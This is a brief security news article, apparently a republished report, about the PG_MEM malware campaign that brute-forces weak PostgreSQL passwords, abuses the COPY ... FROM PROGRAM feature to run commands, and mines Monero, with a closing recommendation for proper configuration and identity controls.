New Malware PG_MEM Targets PostgreSQL DBs for Crypto Mining

SeniorTechInfo
2 Min Read




Unpacking PG_MEM: A New Malware Strain Targeting PostgreSQL Databases

Aug 22, 2024Ravie LakshmananDatabase Security / Cryptocurrency

Unpacking PG_MEM: A New Malware Strain Targeting PostgreSQL Databases

Cybersecurity researchers have recently discovered a sophisticated malware strain called PG_MEM that focuses on infiltrating PostgreSQL database instances to mine cryptocurrency.

According to Aqua security researcher Assaf Morag, PG_MEM leverages brute-force attacks on PostgreSQL by guessing database credentials until access is obtained, exploiting weak passwords in the process. Once inside, attackers can utilize the COPY … FROM PROGRAM SQL command to perform malicious activities such as data theft and malware deployment.

The attack chain identified by cloud security experts involves targeting misconfigured PostgreSQL databases to create an administrator role and exploit the PROGRAM feature to execute shell commands. Successful attacks lead to further reconnaissance and commands to strip superuser permissions.

The malware drops two payloads, PG_MEM and PG_CORE, from a remote server to terminate other processes, establish persistence, and initiate Monero cryptocurrency mining. It utilizes PostgreSQL’s COPY command with the PROGRAM parameter to execute commands and control the server.

According to Morag, the campaign targets internet-facing PostgreSQL databases with weak passwords, highlighting the importance of proper configuration and identity controls to prevent such attacks.

Liked this article? Follow us on Twitter and LinkedIn for more exclusive content.


Share This Article
Leave a comment

Leave a Reply

Your email address will not be published. Required fields are marked *